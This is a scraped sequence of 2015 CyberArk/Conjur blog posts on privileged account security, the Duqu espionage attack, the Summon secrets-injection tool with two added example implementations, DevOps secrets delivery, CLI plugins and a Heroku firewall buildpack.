Just in case you didn’t have the opportunity to attend the conference, we are providing you with Josh’s full presentation below:

Have questions or comments about this presentation?  We’d love to hear from you!  Simply leave a comment below and we’ll be sure to respond.

eBook: Seven Things to Consider When Evaluating Privileged Account Security Solutions https://www.cyberark.com/blog/ebook-seven-things-to-consider-when-evaluating-privileged-account-security-solutions/ Wed, 17 Jun 2015 14:07:43 +0000 https://www.cyberark.com/blog//

It’s been well documented that privileged accounts are required to carry out a successful attack. Just put yourself in an attacker’s shoes: Do I need access to a particular network segment or want to change firewall rules to enable external communication? Do I want to gain access to the domain controller? Or do I want to dump the database table to capture a competitor’s customer list? Unprotected, unmonitored privileged accounts are your keys to the kingdom and a means to unlock your organization’s most sensitive assets – business critical systems, intellectual property, financial information, audit data and more.

You’re convinced that protecting your organization’s privileged accounts is a security imperative as attackers continue to target them to commandeer infrastructure and execute their attacks. But how do you go about selecting the right solutions from the right provider? You need a guide to know what to expect, and what to look for as you evaluate potential privileged account security solutions.

To help you make more informed decisions, we have introduced a new eBook, outlining seven important questions to ask every potential vendor as part of your assessment process, including:

  1. Is the solution really secure? This comprehensive guide outlines seven critical layers of protection that effective privileged account security solutions should employ, along with a checklist of questions to ask each potential vendor during your assessment.
  2. Can it find and protect all of my accounts? A typical enterprise has at least 3 to 4 times as many privileged accounts as employees, so before you can protect them, you have to be able to find and inventory them all throughout your IT environment.
  3. Can it protect all credentials? A comprehensive privileged account security solution will enable your organization to securely store all types of privileged credentials – including SSH keys – and conceal them from end users to reduce the risk of losing them to the wrong hands.
  4. Will it work in my environment? Your IT environment is unique, tailored to your organization’s specific requirements. Be sure that any solution you consider can protect accounts throughout most – if not all – of your IT environment, not just a few specific platforms.
  5. What protections are provided? It’s important to establish an end-to-end lifecycle approach to privileged account management that can be augmented over time and adapt to your organization’s changing needs and priorities. This approach includes 10 key steps.
  6. How can I minimize the cost of managing it? A complete end-to-end privileged account security solution requires multiple products to secure, manage, control and monitor privileged accounts, as well as detect active threats. As a result, organizations can be faced with the challenge of integrating and managing multiple solutions in order to achieve maximum protection. An effective, one-platform solution can help you avoid four common, costly pitfalls.
  7. How reliable is the vendor? The only way to effectively break the attack chain is to proactively prevent attackers from gaining the elevated administrative privileges needed to reach – and steal – sensitive data inside your organization. That’s why it’s critical to ensure that any potential vendor treats privileged account security as its primary, strategic focus. This guide will arm you with specific, pointed questions to ask each potential provider, to help gauge their commitment to ongoing innovation around this critical issue.

Privileged accounts are everywhere. Attack targets and potential security breaches are everywhere. How are you planning to protect what matters most?

To download the free eBook, please visit https://www.cyberark.com/resource/seven-things-to-consider-when-evaluating-privileged-account-security-solutions/.

Privileged Accounts – the New Espionage ‘Asset’ https://www.cyberark.com/blog/privileged-accounts-the-new-espionage-asset/ Fri, 12 Jun 2015 16:04:05 +0000 https://www.cyberark.com/blog//

Discussions about the breach and infiltration of Kaspersky’s network continue to reinforce the emergence of dangerous attack patterns that are leaving no one out of attackers’ sights – not even a security company.

As we know, attribution of an attack is a difficult part of deconstructing a breach – we can see the signatures in malware, see what networks the attackers used to support the attack, but ultimately, we’re almost never 100 percent sure of attribution.

Ultimately, the question of “who” is less important than the “how.”

The motivation for the attack on Kaspersky appears to be pure espionage activity. According to sources, the malware used to execute the attack was an updated version of Duqu, which features code directly derived from Stuxnet, and was allegedly used to spy on Iran’s trade relationships and efforts to develop nuclear material.

It’s hard to think about espionage activities without harkening back to the Cold War and the push and pull of global intelligence agencies as they tried to gain information on rivals, enemies and friends.

This form of espionage was characterized by nations developing ‘assets’ within the structures they wanted to infiltrate. Assets were typically people of some influence – or with access to those of influence – within the organization being spied on. Developing assets on the ground is critical to a successful espionage campaign.

The same is true when it comes to cyber espionage campaigns. In this world, the privileged account or credential is the most valuable intelligence asset that attackers can use.

Privileged accounts provide complete, anonymous access to, and control of, all parts of IT infrastructure, industrial control systems and critical business data. They exist throughout every business. There isn’t one part of the enterprise that isn’t managed by privileged or administrative accounts.

This is why they’re the ultimate intelligence asset for cyber espionage campaigns. Once attackers turn the privileged account into an asset, they can anonymously surveil a company’s security posture, and explore their systems for valuable data and information — often for months at a time.

With this access, attackers can remain virtually undetected and free to exfiltrate information as part of an espionage campaign like this one, which could expose product plans and enable ‘short cuts’ for future attacks; implant malware as part of a financially motivated attack; or simply destroy a company’s ability to do business, as was done to Sony Pictures.

Stopping Advanced Attacks – Stop Lateral Movement

The Kaspersky attack is another lesson in just how critical it is for attackers to be able to move laterally across the network into different machines and devices. The fact that the attackers used multiple zero-day exploits (expensive currency in the hacker world) to facilitate this movement is a sign of how critical it was to the overall attack.

Exploiting privileged accounts is required for lateral movement – by locking down these accounts, and being able to isolate the attack and prevent the escalation of these powerful credentials, organizations can keep attackers confined to the initial footprint of the breach point.

An attacker may or may not be able to find useful information if they’re confined to one employee’s machine, device or single application. This won’t be true if they’re able to steal, exploit and elevate privileges and move about the network freely, accessing databases and information stores.

This is why CyberArk believes that proactive security starts by assuming the attackers will find a way in, and preventing them from moving around the network once they do.

Stay tuned for Part 2 of this post as we take a deeper look at the Kaspersky attack including exploring the zero day connection – including the Kerberos vulnerability – and provide advice to organizations based on what we’ve learned from this and other recent breaches.

Introducing Summon – Get Your Secrets Into Source Control https://www.cyberark.com/blog/introducing-summon-get-your-secrets-into-source-control/ Wed, 10 Jun 2015 19:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/introducing-summon-get-your-secrets-into-source-control/  

Today we’re releasing Summon, an open-source tool to help developers and sysadmins improve workflows that involve access to secrets. Secrets are hard. We can’t check them into source control, even though they are a dependency of every application. We also can’t treat secrets like configuration because storage and retrieval needs to be secure. Summon is a response to this in-between land.

Overview

Summon reads a file called secrets.yml, which is a mapping from environment variable names to secrets identifiers. Using a pluggable provider, it retrieves the values of those secrets and makes them available in the environment of a child process which you specify. The provider’s job is to retrieve the value of a secret based on its identifier. The process only needs to be able to read environment variables: a webapp, deployment script or chef-client run, for example. Once the process exits, the environment variables do not remain on the system.


Read more about the problem in our previous post.

Example

Let’s say we have a Fabric script to deploy our webapp1 to AWS. We want to record the status of the deployment for inspection later, so we’re inserting a record into MongoDB. We’ll need AWS keys and a MongoDB password to accomplish this. Let’s capture this in a secrets.yml file.

We can check this file into Git; there are no secrets in it. Now, anyone who clones the repo can immediately see which secrets the project requires and where they come from. The identifiers in secrets.yml are interpreted by the provider (driver), so they could be Conjur variables, names of secrets in the Keychain, etc.

Now we can wrap the Fabric call with Summon to provide these credentials.

summon --provider ./summon-conjur -f secrets.yml fab -e prod,webapp1 deploy

Note: The -e flag specifies the tags of the instances we want to deploy to, à la awsfabrictasks.

Providers

Summon uses pluggable providers to fetch secrets. A provider’s job is easy: given the identifier of a secret, return its value on stdout or an error message on stderr. We’ve written providers for Amazon S3, Conjur, and the OS X Keychain so far. You can download them from their respective GitHub pages. You can also write your own provider in any language; it can be as simple as a shell script. Summon takes care of interpreting the output.

Summon will also auto-discover providers placed in /usr/libexec/summon/. The path to a provider can also be specified via the --provider flag, as in the example above, or with the environment variable SUMMON_PROVIDER.
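
To make the Overview and the provider contract concrete, here is an added example, constructed for this page rather than taken from Summon’s own Go code: it parses the “NAME: !var identifier” form of secrets.yml used in the examples above, runs a provider executable with the identifier in argv[1] and reads the value from stdout (or the error from stderr), and injects the results into the environment of a child process only. The provider script, secret identifiers and values are constructed stand-ins, and the real Summon’s handling of temp files and other options is not modelled.

```python
"""Constructed miniature of the Summon model; not the real Summon."""
import os
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed secrets.yml: environment variable name -> "!var <identifier>".
# Only identifiers appear here, so the file is safe to commit.
SECRETS_YML = """\
DB_PASSWORD: !var prod/db/password
AWS_ACCESS_KEY_ID: !var prod/aws/access_key_id
"""

# Constructed stand-in for a provider executable. Contract: the secret
# identifier arrives in argv[1]; the value goes to stdout; on failure an
# error message goes to stderr with a non-zero exit status.
PROVIDER_SH = """\
#!/bin/sh
case "$1" in
  prod/db/password)       printf '%s' 'constructed-db-pass' ;;
  prod/aws/access_key_id) printf '%s' 'AKIACONSTRUCTEDKEY' ;;
  *) echo "no such secret: $1" >&2; exit 1 ;;
esac
"""

_LINE_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*):\s*!var\s+(\S+)$")


def parse_secrets_yml(text):
    """Parse 'NAME: !var identifier' lines into {NAME: identifier}.
    Blank lines and comments are skipped; anything else is rejected."""
    mapping = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = _LINE_RE.match(line)
        if not match:
            raise ValueError(f"secrets.yml line {lineno}: unsupported syntax {raw!r}")
        mapping[match.group(1)] = match.group(2)
    return mapping


def fetch_secret(provider, identifier):
    """Run the provider once; its stdout is the secret value."""
    proc = subprocess.run([provider, identifier], capture_output=True, text=True)
    if proc.returncode != 0:
        raise RuntimeError(f"provider failed for {identifier}: {proc.stderr.strip()}")
    return proc.stdout


def summon(provider, secrets_text, argv):
    """Resolve every declared secret, then run argv with them in its
    environment only. Returns (exit_code, stdout); os.environ is untouched."""
    env = dict(os.environ)
    for var_name, identifier in parse_secrets_yml(secrets_text).items():
        env[var_name] = fetch_secret(provider, identifier)
    proc = subprocess.run(argv, env=env, capture_output=True, text=True)
    return proc.returncode, proc.stdout


def write_provider(directory):
    """Write the constructed provider script and make it executable."""
    path = Path(directory) / "summon-constructed"
    path.write_text(PROVIDER_SH)
    path.chmod(0o700)
    return str(path)


def demo():
    """The child sees DB_PASSWORD; the parent's environment never does."""
    with tempfile.TemporaryDirectory() as tmp:
        provider = write_provider(tmp)
        code, out = summon(provider, SECRETS_YML,
                           ["sh", "-c", 'printf "%s" "$DB_PASSWORD"'])
    return code, out, "DB_PASSWORD" in os.environ


def demo_missing():
    """An unknown identifier aborts before the child process is started."""
    with tempfile.TemporaryDirectory() as tmp:
        provider = write_provider(tmp)
        try:
            summon(provider, "API_KEY: !var prod/missing\n", ["true"])
        except RuntimeError as exc:
            return str(exc)
    return None


if __name__ == "__main__":
    print(demo())
    print(demo_missing())
```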

Go

Most of our development in-house is Ruby. The language allows us to be expressive and get things done quickly. Packaging Ruby applications, alas, is not fun. summon and the summon-conjur provider are written in Go because it allows us to package them as a single binary. Therefore, installing Summon takes only two steps: download the release for your platform and unzip it onto your system.

Give Summon a spin and let us know what you think. Open an issue or submit a pull request. We’ll have an open hangout later this month to talk about Summon. Let’s make this awesome together.

SecDevOps 2.0 | Managing Your Robot Army [SLIDESHARE] https://www.cyberark.com/blog/secdevops-2-0-managing-your-robot-army-slideshare/ Tue, 09 Jun 2015 16:15:00 +0000 https://cyberarkvx2.wpengine.com/blog/secdevops-2-0-managing-your-robot-army-slideshare/  

As we mentioned, our very own Josh Bregman had the amazing opportunity to speak in the DevOps Connect track at InfoSecurity Europe last week.

In case you weren’t lucky enough to see the presentation live in London we have included it for your viewing pleasure below.

If you have any questions or need clarification on the slides please feel free to ping Josh on Twitter.

Continuous Secrets Delivery https://www.cyberark.com/blog/continuous-secrets-delivery/ Fri, 05 Jun 2015 18:22:00 +0000 https://cyberarkvx2.wpengine.com/blog/continuous-secrets-delivery/  

Hanging out with the IT Crowd in London.


I’m sitting in the airport lounge in Madrid on my way back to Boston after a whirlwind 2 days at the Infosec Europe conference.  I was summoned into service at the last minute when Elizabeth unfortunately wasn’t able to make the trip, and I took her speaking spot at the DevOps exchange.  I’ve been at Conjur for just a few weeks so this was my first opportunity to really interact with the DevOps community personally.

First of all, I want to thank Alan Schimmel from DevOps.com and Wai Man Yau from Sonatype for both being exceptionally gracious hosts for the events.  Wai Man and the entire Sonatype crew including Josh Corman were a blast to hang out with.  Thanks to them (and a few pints) – project Cauldron is dead – long live project Summon.  A great example of failing fast and a judgement-free post-mortem on my talk.

I also had the great pleasure of meeting Justin Arbuckle from Chef and watching his presentation.  I’ve always been a fan of Jim Collins’ Good to Great, so I loved Justin’s talk entitled “Velocity is your Hedgehog, Compliance is your Fox”.  Justin’s idea is that the one thing DevOps-enabled enterprises know is velocity: faster, faster, faster.  This idea is what drives the flywheel: keep pushing, and pushing, until it takes off.  “Compliance is the fox” means that compliance concerns will constantly come up and will need to be addressed, but NOT at the expense of velocity.  Easier said than done, to be sure.

After my talk, Justin said that he liked the concept of Continuous Secrets Delivery that I discussed in my talk.  Continuous Secrets Delivery is a methodology that we’ve found works across customers and industries to ensure that secrets management isn’t the hurdle that trips up the team and ruins your velocity.

By following this approach, teams can avoid adding to their security debt that ultimately makes the information security folks call a timeout on their project.

Here it is:

Define a Policy

Much has been said about the cultural challenges of bringing Dev and Ops and Security together towards a common goal, but there needs to be basic alignment on which people and code, based upon their role, need access to which secrets.  This policy should be collectively reviewed and committed to source control.  The configuration of that policy should be strictly codified – as in the case of Conjur’s Policy DSL – but regardless of format, this step is critical.  Information security doesn’t always want to say “No”, so it’s their responsibility to be proactive, and give guidance on how to apply their risk management framework and best practices to secrets management.

“Get Your Secrets into Source Control”

This is the working tagline of project Summon.  The idea is that you create a secrets.yml file for each project (application or service). This file declares the secrets that the software needs access to, and into which environment variable each piece of secret data should be “summoned”.  The secrets.yml file has no actual secrets in it, and can safely be checked into source control.

The “summon” command line tool can then be used to launch the application, container or service. For example:

# Start Rack-based server app (e.g. in an upstart script)
$ summon rackup
# Run a Dockerized app; each -e exposes a variable declared in secrets.yml
$ summon docker run \
   -d \
   -e SSL_PRIVATE_KEY_FILE \
   -e SSL_CERT_FILE \
   -e DB_PASSWORD \
   myapp

Create Host Factories

A host factory is a mechanism for “lifting” a new host (machine, container, or PaaS application) into a privileged computing role. For example, Conjur’s Host Factory generates a new host (machine) identity and grants it a specific set of roles.  Getting this right is of critical importance in achieving velocity with compliance.  If there are any manual steps in this process – like changing network settings or manual approvals – then you can’t go fast.  If every machine has the same identity, that’s obviously fast, but is it secure?  All of those machines’ audit records will have the same identifier.  This calls for something dynamic, like a token service (OAuth Dynamic Client Registration) or Conjur Host Factory, that lets machines and/or toolchains assign the correct identity automatically and securely.

Make it Highly Available

In the Summon model, the system that provides the secret is called a “secrets provider”.  This service needs to be highly available and performant across the entire infrastructure, including multi-cloud, multi-region, and hybrid cloud environments.  To be fast, the secrets need to be securely distributed to the processing environment of the application.

Integrate with the DevOps Toolchain

The final step in scaling out the application is to integrate with the other tools in the toolchain; for example Puppet, Chef, SaltStack, Ansible, AWS, Docker, Heroku, Kubernetes, etc.  Conjur provides integration libraries for many of these.

Ironically, many teams start with the last step, and try to turn their configuration management system or cloud storage service into a secrets server.  Configuration management tools weren’t built for this task.  There is an expression: “Sometimes when all you have is a hammer, everything looks like a nail.”  Using configuration management for secrets management is a surefire way to slow the velocity of your project. Gaining alignment up front can be organizationally and culturally challenging, but it’s the only path forward to maintain velocity and compliance.  It’s a much easier conversation to have up front than AFTER something bad happens, or after information security won’t allow the application to go into production because they find plain-text database passwords in Jenkins log files, Chef data bags, Puppet Hiera, GitHub repos or an S3 bucket.

This 5-step process of Continuous Secrets Delivery has been borne out of years of experience solving this problem across customers and technologies, but we want to hear from you.  What’s your process?  Did we miss anything?

Josh Bregman Presenting at DevOps Connect in London https://www.cyberark.com/blog/josh-bregman-presenting-at-devops-connect-in-london/ Wed, 03 Jun 2015 17:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/josh-bregman-presenting-at-devops-connect-in-london/  

Our very own Josh Bregman will be speaking in London at Infosecurity Europe this Thursday, June 4 at 2:30 GMT.  His talk, SecDevOps 2.0 – Managing your Robot Army, will focus on how a security orchestration system is the foundation of SecDevOps 2.0. Josh will also be previewing Cauldron, an open source project for integrating secrets into DevOps toolchains. This is some pretty exciting stuff, you definitely don’t want to miss it!

Josh will be in London all week and would love to meet with you and get your take on the world of DevOps and Security. Want to meet up with Josh at #InfoSec15? Contact him at josh.bregman@conjur.net and schedule a time to chat about all things DevOps. Josh loves connecting on Twitter and wants to follow you. Tweet to him @kingoauth during or after his session. Don’t forget to use #Infosec15Conjur!

Josh is thrilled to be attending DevOps Connect. With 20 years of experience successfully architecting, evangelizing, and delivering innovative identity management and security products to customers he can’t wait to join the DevOps security conversation.

See Josh Speak at DevOps Connect in London

Guest Post: Nucleus Research Assesses ROI Business Case of the CyberArk Privileged Account Security Solution https://www.cyberark.com/blog/guest-post-nucleus-research-assesses-roi-business-case-of-the-cyberark-privileged-account-security-solution/ Tue, 02 Jun 2015 13:06:24 +0000 https://www.cyberark.com/blog//

By Rebecca Wettemann, VP of Research, Nucleus Research

When it comes to IT security initiatives, many enterprises struggle to quantify business value and return on investment (ROI), viewing them solely as an insurance expense – a must-have in today’s era of inevitable attacks. But by implementing the right solutions, organizations can mitigate a multitude of security challenges while enabling business agility and achieving measurable operational benefits.

Industry experts estimate that 80 to 100 percent of serious security incidents involve the exploitation of privileged accounts. To understand how organizations can better protect themselves against advanced threats, my team at Nucleus Research recently explored a series of actual deployments of the CyberArk Privileged Account Security Solution. During a number of in-depth customer conversations, we not only found that the company’s suite of security tools drove a centralized and consistent approach to managing privileged access for reduced risk, but also significant business benefits, including increased productivity and reduced costs. We found that organizations can achieve complete payback from an initial CyberArk deployment within six months or less and gain greater ROI as the CyberArk platform is used over time.

Our discussion series revealed that while security remains a primary driver, there are three compelling reasons why customers were drawn to the CyberArk solution, including:

  • Ease of deployment, intuitive administrative interface and the ability to manage all privileged credentials in one vault enabled administrators to rapidly come up to speed on the solution and gain benefit.
  • Because customers could choose one initial area or component to address and extend the solution easily as they needed over time, they were able to flexibly respond to changing security needs with limited additional investment or disruption.
  • Integrated solution approach. Companies moving from multiple point solutions with disparate interfaces found the centralized platform drove greater management efficiencies and ease of reporting.

Additionally, we identified four key benefits companies achieved from deploying the CyberArk Privileged Account Security Solution, including:

  • Reduced risk: Most customers cited reduced risk as one of the most important benefits of deploying CyberArk.
  • Improved compliance: We found improved compliance with the ability to easily address audit requirements was a common benefit shared by all CyberArk customers.
  • Increased productivity: Automating privileged credentials management and password change processes enabled customers to reduce administrator time spent on credentials management by 20 to 50 percent or more.
  • Reduced audit costs: We found CyberArk customers could reduce resources and time dedicated to auditing by up to 40 percent.

To read real customer anecdotes detailing their success while using the CyberArk integrated solution, along with our full analysis of the CyberArk Privileged Account Security Solution, please visit www.CyberArk.com/ROI.

Get Your Secrets Into Source Control https://www.cyberark.com/blog/get-your-secrets-into-source-control/ Fri, 29 May 2015 18:41:00 +0000 https://cyberarkvx2.wpengine.com/blog/get-your-secrets-into-source-control/  

“Get your secrets into source control!”

That may seem like rather strange advice, but it’s exactly what we’re going to try and do. Allow me to explain!

Agile and DevOps are setting the world on fire, and there are plenty of problems that are yet to be solved. But one thing everyone can agree on is that the more stuff which is tracked in source control, the better.

However, secrets aren’t safe in source control, which means that they often live an independent existence outside of the mainstream code/commit/test/deploy workflows.

At Conjur, we’re building a simple, extensible software tool that will provide the best of both worlds: better security by moving secrets out of source control, combined with the convenience of having secrets in source control. We’re not quite ready to release the software, but we are ready to discuss (and get your feedback on) the requirements and design goals. So please read on…

The Problem:

The first problem that ensues when secrets are separated from source control is that it’s not even clear which secrets are needed to run an application. Once you checkout the repository, you either have to dig through the documentation (which is hopefully current), or start monkey-testing the app to figure out what’s needed to get it to work.

Once you figure out what secrets you need, you have to obtain them. You may have some already, in another directory. You may copy them over into the new project, maybe have to reformat them a little bit. It may turn out that your secret is expired, and you’re stuck hunting it down anew. You may ask a fellow team member to provide you with a secret that you don’t have; frequently these secrets are sent over insecure transport media like email and chat.

Next, the application may not be expecting the secrets to be provided by the environment. If the secrets are embedded into configuration files, it’s not even enough for you to have the secret; you have to find the right file and place the secret there. Keeping secrets in configuration files is a practice that needs to be phased out; you can read a further exposition of this point of view at 12factor.net/config. Summon works best with 12factor applications; in fact it strongly pushes in this direction. That means predictability for developers, operations and security folks.

Overall, ad-hoc secrets management is a big pain, and the only reason anybody tolerates it is that they are used to it.

The Solution:

Well, let’s create a better way. The new standard for secrets in code, which we’re calling Summon, has the following design:


  • Secrets are declared explicitly in a safe source code file that gets committed along with the rest of the project code. We’ll call it secrets.yml. secrets.yml contains the names of secrets, but not the actual values.

  • Secrets are injected into the application when it’s launched.

  • By default, secrets are obtained from the process environment. However, secrets may also be placed in files for the application to read.

  • Secrets are physically stored in a secure location which is not the source control repository. The specifics of secrets storage and retrieval are abstracted, so that the application code is not explicitly tied to the secrets provider. In other words, there’s a swappable secrets backend, which decouples the infrastructure code from the secrets provider.

  • Different secrets providers can be used in development, stage and production without having to modify the deployment artifacts (e.g. installer packages, VM images, container images).

  • Summon runs anywhere; it’s lightweight and easy to install.

  • It’s simple and easy to develop new backend providers.
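To make the design above concrete, here is a small Ruby sketch of the workflow the bullets describe. It is an added example, not Summon’s own code, and it assumes its own simple secrets.yml convention (a plain string value is the id of the secret in the backend and is injected as an environment variable; a mapping with file: true is written to a 0600 temporary file and the file’s path is injected instead), an in-memory provider standing in for a real secrets backend, and constructed sample ids and values.

```ruby
require 'yaml'
require 'tempfile'

# Constructed secrets.yml for illustration. It names the secrets the app needs
# and where each one should go; it never contains a value, so it is safe to
# commit alongside the code. (Convention assumed here, not Summon's real syntax:
# a string is the secret id, injected into the environment; a mapping with
# file: true is written to a temp file and the path is injected instead.)
SECRETS_YML = <<~YAML
  DATABASE_PASSWORD: prod/db/password
  BILLING_API_TOKEN: prod/billing/api-token
  TLS_CERT:
    id: prod/tls/cert
    file: true
YAML

# Swappable backend: anything that responds to fetch(id) -> String will do.
# This one is an in-memory stand-in for a real secrets store.
class MemoryProvider
  def initialize(store)
    @store = store
  end

  def fetch(id)
    @store.fetch(id) { raise KeyError, "no such secret: #{id}" }
  end
end

class Summoner
  def initialize(provider)
    @provider = provider
  end

  # Resolves every declaration. Returns [env_hash, tempfiles]; the caller owns
  # the tempfiles and must close! them once the child process has exited.
  def resolve(yaml_text)
    decls = YAML.safe_load(yaml_text)
    raise ArgumentError, 'secrets.yml must be a mapping' unless decls.is_a?(Hash)

    env = {}
    files = []
    decls.each do |name, spec|
      id, to_file = spec.is_a?(Hash) ? [spec['id'], spec['file'] == true] : [spec, false]
      value = @provider.fetch(id)        # fail fast on a missing secret
      if to_file
        f = Tempfile.new(name)
        f.chmod(0o600)                   # readable by the launching user only
        f.write(value)
        f.flush
        files << f
        env[name] = f.path
      else
        env[name] = value
      end
    end
    [env, files]
  end

  # Launches cmd with the secrets in its environment, then removes the files.
  def run(yaml_text, *cmd)
    env, files = resolve(yaml_text)
    system(env, *cmd)
  ensure
    files&.each(&:close!)
  end
end

if $PROGRAM_NAME == __FILE__
  provider = MemoryProvider.new(
    'prod/db/password'       => 'constructed-db-password',
    'prod/billing/api-token' => 'constructed-api-token',
    'prod/tls/cert'          => "-----BEGIN CERTIFICATE-----\n(constructed)\n"
  )
  # The child process sees the values; the repository only ever saw the names.
  Summoner.new(provider).run(SECRETS_YML, 'sh', '-c',
    'test -n "$DATABASE_PASSWORD" && test -r "$TLS_CERT" && echo "secrets injected"')
end
```

The provider is the swappable piece: replacing MemoryProvider with one that calls a real store leaves both the application and secrets.yml unchanged, which is what lets the same artifact run against different providers in development, stage and production.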

We’re still a few weeks away from an official release, but we are ready for you to get involved! Simply click the button below and fill out the form and we’ll let you know when Summon is ready (we promise not to spam you with marketing emails):

We look forward to solving this tough problem together with you all!

]]>
Josh Bregman Joins Conjur! https://www.cyberark.com/blog/josh-bregman-joins-conjur/ Thu, 21 May 2015 19:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/josh-bregman-joins-conjur/  

I almost passed on Netegrity.

I called them and said I wasn’t coming. When you’re 25 and it’s the beginning of the dot-com boom, there is a never-ending sea of “opportunities”. I had accepted the Netegrity offer but another one came in that seemed better. My dad, who is a very smart guy, said “Josh, you gave them your word.” He probably didn’t know that Netegrity would go on to define and lead (for a while) what became the multi-billion dollar Identity and Access Management market.

Good thing he’s from the Midwest, because his homespun advice rang true and I decided to join Netegrity as a Senior Engineer in 1999. I’ve worked in and around the space for the last 15 years – a very nice ride indeed.

Conjur is the next Netegrity.

The parallels are striking. In 1999 there was a huge shift that was changing the way that companies built applications: the Internet. In 2015, there is a huge shift in the way that companies build applications: DevOps. In the early days of Netegrity, people were saying things like “I can build it myself, I have Apache”. Today, in my early days at Conjur, people are saying things like “I can build it myself, I have Consul”. Netegrity landed some key early deals like GE and Daimler and the thing took off like a rocket ship. Conjur already has Netflix and Novartis. The rocket ship is fueling up and I wanted to get on for another ride.

Conjur is DevOps Security….done.

Conjur offers a solution to a very real problem. Companies across all verticals – even those that are historically technology laggards like retail and insurance – are going to great lengths to bring DevOps to their organizations. This is more than just a fad – it is a fundamental shift in the way in which companies build applications. The existing security tools and vendors can’t be accepted by DevOps and the DIY and open-source projects can’t be endorsed by information security. There is a hole in the market, and Conjur is filling it.

At the end of the day, the most striking thing about Netegrity and my experience there was just how many really smart people worked there and how, 15 years later, the ex-Netegrity folks still have had an impact on the industry. It’s my belief that this will be the biggest parallel of them all – that Conjur will be the epicenter of DevOps security and I will have been very lucky to have been there from the beginning. Thanks Kevin and Elizabeth for the opportunity.

Please contact me at josh.bregman@conjur.net or @kingoauth if you’d like a seat on the rocketship next to us!

Josh has 20 years of experience successfully architecting, evangelizing, and delivering innovative identity management and security products to customers. Before joining Conjur, Josh spent a decade as a solutions and pre-sales leader in the Oracle ecosystem. In his early career Josh worked as a software engineer at IBM, GTE Labs, and Netegrity. He has two U.S. patents and received a B.A. in Math from the University of Rochester in 1995.

]]>
Extending Conjur with Plugins https://www.cyberark.com/blog/extending-conjur-with-plugins/ Mon, 11 May 2015 16:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/extending-conjur-with-plugins/  

Conjur comes with a great set of features out of the box. But what if you need to add new functionality or change how Conjur does something to better fit your needs? You can do this with Conjur plugins. In this post I’ll cover when you may want to use Conjur plugins, how they work, and how you can get started with your own plugins.

When would I use a plugin?

Here are a few use cases where a plugin can be helpful.

1. You want to administer a service that uses or modifies Conjur resources. For example, the aws plugin allows you to create an AWS IAM role with permission to read a Conjur host factory token stored in S3.

2. You want to abstract a common pattern into a higher-level workflow. Let’s say you have a data analytics team in your organization that uses several third party services and needs to store their credentials in Conjur. You want them to store the credentials in a uniform way: in a specific format with the correct roles granted access. You can write a plugin for your analytics team that prompts them for the service, username and password. The plugin would create the variable and grant the correct permissions to your groups and layers.

3. You want to augment an existing Conjur command. The audit-send plugin is an example of this pattern. It adds a send subcommand to the audit command that allows you to send custom audit events to Conjur.

4. You want to modify an existing Conjur command. For example, you can enforce a namespacing scheme for variables in your organization by modifying the conjur variable create command to suggest and enforce a namespace like division/product/service/api-key.

How do plugins work?

Conjur CLI plugins are implemented as Ruby gems. They use the naming scheme conjur-asset-<plugin-name>. When you install a plugin, the gem is installed into the CLI package’s embedded Ruby and a marker is placed in your conjurrc file. Any commands the plugin defines are then available the next time you run the CLI.

Here is an example – we will install the proxy plugin. It allows you to simply add Conjur authentication headers on outbound requests.

 

After installation, the proxy plugin is available to use the same way you’d use other Conjur commands. You can read more about how to use proxy here.

How do I write a Conjur plugin?

Conjur plugins use the GLI library for command-line parsing. To write your own plugin, you inherit from the Conjur::Command class. This gives you access to the api object, a client you can use to make calls to Conjur. The client is authenticated as the user/host that is logged into the CLI.

Here is a simple example, an application of the first use case above, with Jenkins:

 

Now you can launch builds in Jenkins, if your user has access to the jenkins/api-key variable. Access to the API key is managed and audited with Conjur.

We have released several plugins already that you can use as examples to work from. Here are the ones we use most often internally.

  • audit-send – Send custom audit events
  • host-factory – Bootstrap hosts into layers
  • proxy – Simple HTTP proxy that adds Conjur authentication headers

All of our plugins are open-source and hosted on Github. The Conjur CLI is also open-source.

Let us know what great plugins you create or use!

 

]]>
A Software Defined Firewall for Heroku https://www.cyberark.com/blog/a-software-defined-firewall-for-heroku/ Thu, 07 May 2015 20:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/a-software-defined-firewall-for-heroku/  

Traditional IT environments are protected with perimeter software like the good ol’ VPN. In the cloud setting, the one, all-encompassing VPN is replaced with (or supplemented by) a more granular set of interlocking “security groups” (to use AWS parlance).

In the world of PaaS, containers and microservices, security groups themselves are obsolete. Why? Because application containers are distributed across a near-uniform cluster of servers or virtual machines. The topology of container placement onto host machines is constantly shifting and changing. In the older world, application code could be segregated from the database servers by a network boundary. In a PaaS architecture, these containers can (and likely will) run side-by-side on the same host OS.

Yet, network security can’t simply be abandoned as a relic of a bygone age. At Conjur, our customers are hitting this problem head-on as they move rapidly towards PaaS and Docker. They’re asking us for a “software-defined firewall”: a perimeter-like barrier with granularity as fine as individual containers. And to meet their continuous delivery objectives, it needs to deliver a convenient workflow and user experience for developers, operations, security, and compliance teams.

As an example of how we approach this problem, we’re now providing a Heroku buildpack which can be used to add a software-defined firewall in front of any Heroku application or web service. It’s available at https://github.com/conjurinc/heroku-buildpack-conjur, and it works like this (full README available in Github).

  • First, make sure you are on the Heroku cedar-14 stack.

  • Then configure buildpacks to combine your base buildpack (e.g. Ruby or Node.js) with the Conjur buildpack.

  • Next, configure your application to listen to /tmp/nginx.socket for new connections, and to touch /tmp/app-initialized when it’s ready to receive traffic.

  • Finally, configure the application with the id of a Conjur resource; inbound requests will need to have specific privileges on this resource in order to be passed through.

When your app starts up, it’s now running behind a gatekeeper which is selectively filtering inbound traffic according to Conjur RBAC and privilege grants.

From a technical standpoint, here’s how the system works.

Software Defined Firewall for Cloud-based PaaS

  1. The client authenticates with Conjur, and obtains a bearer token. To eliminate latency, tokens can be prefetched so that a token is already available when the client needs it.

         a.  The icon with 4 circles represents the token

         b.  The client can be a person, or code (e.g. another service)

  2. The client sends an outbound HTTPS request, with the token on the Authorization header.

  3. The gatekeeper receives the inbound request. The gatekeeper constructs a request to the Conjur authorization service, with the client’s Authorization token on this request.

         a.  The brick wall represents the gatekeeper

